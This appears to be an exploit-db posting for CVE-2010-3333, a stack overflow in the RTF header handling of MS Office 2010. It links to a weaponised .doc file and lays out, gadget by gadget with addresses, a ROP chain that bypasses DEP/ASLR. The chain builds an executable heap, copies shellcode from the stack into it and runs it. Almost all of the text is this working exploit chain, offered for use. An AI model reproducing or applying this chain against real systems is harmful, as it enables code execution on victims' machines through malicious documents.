MS Office 2010 RTF Header Stack Overflow Vulnerability Exploit

                                                # Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability
Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j < at > gmail )
# Version: MS Office <= 2010
# Tested on: MS Office 2010 ( 14.0.4734.1000) - Windows 7
# CVE : CVE-2010-3333
 
# This is the exploit I wrote for Abysssec "The Arashi" article.
# It gracefully bypass DEP/ASLR in MS Office 2010,
# and we named this method "Ikazuchi DEP/ASRL Bypass" : >
# unfortunately msgr3en.dll loads a few seconds after opining office,
# so just need to open open Office , and then open exploit after a few
second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
               http://www.exploit-db.com/download_pdf/17469
 
# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
http://www.0days.ir/article/
 
Exploit:  http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc
 
 
#
# and the Rop :
 
3F2CB9E0    POP ECX
            RETN
        # HeapCreate() IAT = 3F10115C
 
3F389CA5    MOV EAX,DWORD PTR DS:[ECX]
            RETN
        # EAX == HeapCreate() Address
 
3F39AFCF    CALL EAX
            RETN
        # Call HeapCreate() and Create a Executable Heap :D
        # after this call, EAX contain our Heap Address.
 
0x3F2CB9E0    POP ECX
        RETN
        # pop 0x00008000 into ECX
 
0x3F39CB46    ADD EAX,ECX
        POP ESI
        RETN
        # add ECX to EAX and instead of calling HeapAlloc,
        # now EAX point to the RWX Heap :D
 
0x3F2CB9E0     POP ECX
        RETN
        # pop 0x3F3B3DC0 into ECX, it is a writable address.
 
0x3F2233CC     MOV DWORD PTR DS:[ECX],EAX
        RETN
        # storing our RWX Heap Address into 0x3F3B3DC0 ( ECX ) for
further use ;)
 
0x3F2D59DF     POP EAX
        ADD DWORD PTR DS:[EAX],ESP
        RETN
        # pop 0x3F3B3DC4 into EAX , it is writable address with zero!
        # then we add ESP to the Zero which result in storing ESP into
that address,
        # we need ESP address for copying shellcode ( which stores in
Stack ),
        # and we have to get it dynamically at run-time, now with my
tricky instruction, we have it!
 
 
0x3F2F18CC    POP EAX
        RETN
        # pop 0x3F3B3DC4 ( ESP address ) into EAX
 
 
0x3F2B745E     MOV ECX,DWORD PTR DS:[EAX]
        RETN
        # now ECX point to nearly offset of Stack.
 
0x3F39795E    POP EDX
        RETN
        # pop 0x00000024 into EDX
 
0x3F39CB44    ADD ECX,EDX
        ADD EAX,ECX
        POP ESI
        RETN
        # add 0x24 to ECX ( Stack address )
 
0x3F398267     MOV EAX,ECX
        RETN
        # EAX = ECX ; )
 
0x3F3A16DE    MOV DWORD PTR DS:[ECX],EAX
        XOR EAX,EAX
        POP ESI
        RETN
        # mov EAX ( Stack Address + 24 = Current ESP value ) into the
current Stack Location,
        # and the popping it into ESI ! now ESI point where shellcode
stores in stack :D
 
0x3F398267     MOV EAX,ECX
        RETN
        # EAX = ECX ; )
 
3F2CB9E0    POP ECX
        RETN
        # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
 
0x3F389CA5     MOV EAX,DWORD PTR DS:[ECX]
        RETN
        # now EAX point to our RWX Heap
 
0x3F2B0A7C     XCHG EAX,EDI
        RETN 4
        # EDI = Our RWX Heap Address
 
 
3F2CB9E0    POP ECX
        RETN
        # pop 0x3F3B3DC0 ( Saved Heap address ) into ECX
  
 
0x3F389CA5     MOV EAX,DWORD PTR DS:[ECX]
        RETN
        # now EAX point to our RWX Heap
 
0x3F38BEFB     ADD AL,58
        RETN
        # just skip some junks ; )
 
3F2CB9E0    POP ECX
        RETN
        # pop 0x00000080 into ECX ( 0x80 * 4 = 0x200 = Copy lent )
 
3F3441B4    REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
        POP EDI
        POP ESI
        RETN
        # Copy shellcode from stack into RWX Heap
 
 
3F39AFCF     CALL EAX
        RETN
        # KABOOM !!!
 
Exploit:  http://www.exploit-db.com/sploits/cve-2011-3333_exploit.doc